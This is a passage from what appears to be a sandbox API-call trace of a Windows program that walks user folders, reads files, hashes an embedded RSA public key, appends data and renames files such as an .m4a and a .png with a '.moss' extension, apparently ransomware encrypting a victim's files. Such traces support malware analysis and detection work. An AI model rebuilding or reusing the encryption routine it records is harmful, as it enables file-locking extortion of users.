returned="5p5NrGJn0jS HALPmcxz\\" [0172.104] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.105] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.105] PathFindFileNameW (pszPath="") returned="" [0172.105] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.105] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.105] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.105] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0172.105] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.105] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.105] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0172.105] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.105] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0172.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.106] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.106] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.106] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.106] PathFindFileNameW (pszPath="") returned="" [0172.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.107] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f28b8 | out: hHeap=0xcd0000) returned 1 [0172.107] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.107] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0172.107] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.107] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.107] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2d68 | out: hHeap=0xcd0000) returned 1 [0172.107] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.107] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\") returned="1dBcNb8\\" [0172.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\") returned="5RddQRlUxLC956\\" [0172.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0172.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.108] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.108] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.108] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.108] PathFindFileNameW (pszPath="") returned="" [0172.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae90d7c0, ftCreationTime.dwHighDateTime=0x1d5e575, ftLastAccessTime.dwLowDateTime=0xadd0f950, ftLastAccessTime.dwHighDateTime=0x1d5d873, ftLastWriteTime.dwLowDateTime=0xadd0f950, ftLastWriteTime.dwHighDateTime=0x1d5d873, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.108] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.108] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae90d7c0, ftCreationTime.dwHighDateTime=0x1d5e575, ftLastAccessTime.dwLowDateTime=0xadd0f950, ftLastAccessTime.dwHighDateTime=0x1d5d873, ftLastWriteTime.dwLowDateTime=0xadd0f950, ftLastWriteTime.dwHighDateTime=0x1d5d873, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.108] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d608a0, ftCreationTime.dwHighDateTime=0x1d5e24f, ftLastAccessTime.dwLowDateTime=0xc3b44980, ftLastAccessTime.dwHighDateTime=0x1d5dcc8, ftLastWriteTime.dwLowDateTime=0xc3b44980, ftLastWriteTime.dwHighDateTime=0x1d5dcc8, nFileSizeHigh=0x0, nFileSizeLow=0x6476, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LhauEu1.m4a", cAlternateFileName="")) returned 1 [0172.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\LhauEu1.m4a") returned=".m4a" [0172.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\LhauEu1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1dbcnb8\\lhaueu1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.108] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=25718) returned 1 [0172.108] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.111] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.111] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.112] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6476, lpOverlapped=0x0) returned 1 [0172.112] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.112] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.113] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.113] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.113] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.113] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.113] GetLastError () returned 0x0 [0172.113] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.113] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.113] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.113] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.113] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.114] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.114] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6476, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.114] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.114] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\LhauEu1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1dbcnb8\\lhaueu1.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\LhauEu1.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1dbcnb8\\lhaueu1.m4a.moss")) returned 1 [0172.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.115] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.116] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.116] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f1e5780, ftCreationTime.dwHighDateTime=0x1d5dcf9, ftLastAccessTime.dwLowDateTime=0x6f709cb0, ftLastAccessTime.dwHighDateTime=0x1d5ddc3, ftLastWriteTime.dwLowDateTime=0x6f709cb0, ftLastWriteTime.dwHighDateTime=0x1d5ddc3, nFileSizeHigh=0x0, nFileSizeLow=0xd8ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SGTy2knpU9qG.png", cAlternateFileName="SGTY2K~1.PNG")) returned 1 [0172.116] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.116] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0172.116] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.116] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\SGTy2knpU9qG.png") returned=".png" [0172.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\SGTy2knpU9qG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1dbcnb8\\sgty2knpu9qg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.117] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=55469) returned 1 [0172.117] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.120] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd887, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.120] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.121] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.121] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.121] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xd8ad, lpOverlapped=0x0) returned 1 [0172.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.121] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.121] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.122] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.122] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.122] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.122] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.122] GetLastError () returned 0x0 [0172.123] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.123] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.123] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.123] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.123] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd8b0) returned 0x3b62d40 [0172.123] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0172.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48820 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b514c0 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e1f0 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b51508 [0172.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e208 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e238 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e250 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0172.124] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e238 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e250 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e250 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e238 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa26a0 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0172.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e250 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e238 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 